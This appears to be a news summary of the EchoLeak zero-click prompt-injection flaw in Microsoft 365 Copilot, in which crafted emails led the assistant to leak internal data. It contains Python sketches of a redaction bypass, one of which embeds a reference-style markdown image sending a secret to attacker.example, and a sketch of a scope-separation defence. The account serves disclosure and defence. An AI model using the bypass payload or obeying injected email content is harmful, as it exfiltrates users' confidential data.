Aim Security Ltd. has uncovered what it describes as the first known zero-click AI vulnerability, dubbed EchoLeak, in Microsoft 365 Copilot, which allowed attackers to exfiltrate sensitive data without any user interaction.
EchoLeak exploited an 'LLM Scope Violation' in Copilot's generative AI tool, using crafted markdown syntax to bypass security defenses and retrieve sensitive data.
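The class of bypass described here can be illustrated with a minimal sketch: a naive redaction filter that strips inline markdown links and images can miss reference-style markdown, whose URL lives in a separate definition line. The filter below is hypothetical and illustrative only, not Copilot's actual defense, and `attacker.example` is a placeholder domain.

```python
import re

# Hypothetical redaction filter: strips inline markdown links/images,
# i.e. [text](url) and ![alt](url), replacing them with a placeholder.
INLINE_LINK = re.compile(r"!?\[[^\]]*\]\([^)]*\)")

def redact_inline_links(text: str) -> str:
    """Remove inline-style markdown links; reference-style links slip through."""
    return INLINE_LINK.sub("[redacted]", text)

# Inline-style image: caught by the filter.
inline = "See ![logo](https://attacker.example/leak?d=SECRET)"
# Reference-style image: the URL sits in a separate definition line,
# so the naive inline pattern never matches it.
reference = "See ![logo][r]\n\n[r]: https://attacker.example/leak?d=SECRET"

print(redact_inline_links(inline))     # external URL is stripped
print(redact_inline_links(reference))  # external URL survives redaction
```

The gap is structural: any filter that reasons about one markdown syntax at a time can be sidestepped by an equivalent syntax it does not model.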
The exploit leveraged Microsoft's trusted domains to embed malicious content in emails processed by Copilot, posing a significant threat to internal data security.
The attack required no user interaction: Copilot's own automated processing of incoming email triggered the entire data exfiltration chain behind the scenes.
Aim demonstrated a proof-of-concept showing how internal documents could be leaked undetected, prompting Microsoft to acknowledge the issue.
There is no evidence of the vulnerability being exploited in the wild, but cybersecurity experts warn of future risks as AI services are susceptible to similar attacks.
Following Aim's responsible disclosure, Microsoft addressed the vulnerability, underscoring the need for stronger security measures in AI systems.
Security experts emphasize the broader implications of such vulnerabilities for sectors like government, defense, and healthcare, where AI assistants can be manipulated by attackers.
AI assistants that process untrusted inputs alongside internal data are vulnerable to scope violations, pointing to a systemic design flaw that demands stricter separation of trusted and untrusted content.
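One possible form of such content separation can be sketched as follows: every retrieved snippet carries a trust scope, and the prompt builder refuses to mix external content with internal data in a single LLM call. The `Snippet` type, scope labels, and rejection policy below are illustrative assumptions, not any vendor's actual implementation.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Snippet:
    """A retrieved piece of context, tagged with its trust scope."""
    text: str
    scope: str  # "internal" (trusted) or "external" (untrusted), by assumption

def build_prompt(query: str, snippets: List[Snippet]) -> str:
    """Assemble an LLM prompt, rejecting any mix of trust scopes.

    Raises ValueError rather than letting untrusted external content
    share a prompt with internal data (a crude scope-violation guard).
    """
    scopes = {s.scope for s in snippets}
    if "external" in scopes and "internal" in scopes:
        raise ValueError(
            "scope violation: external content cannot share a prompt with internal data"
        )
    context = "\n---\n".join(s.text for s in snippets)
    return f"Context:\n{context}\n\nQuestion: {query}"
```

A guard this coarse trades capability for safety; real systems would need finer-grained policies, but the core idea is that separation is enforced before the model ever sees the mixed content.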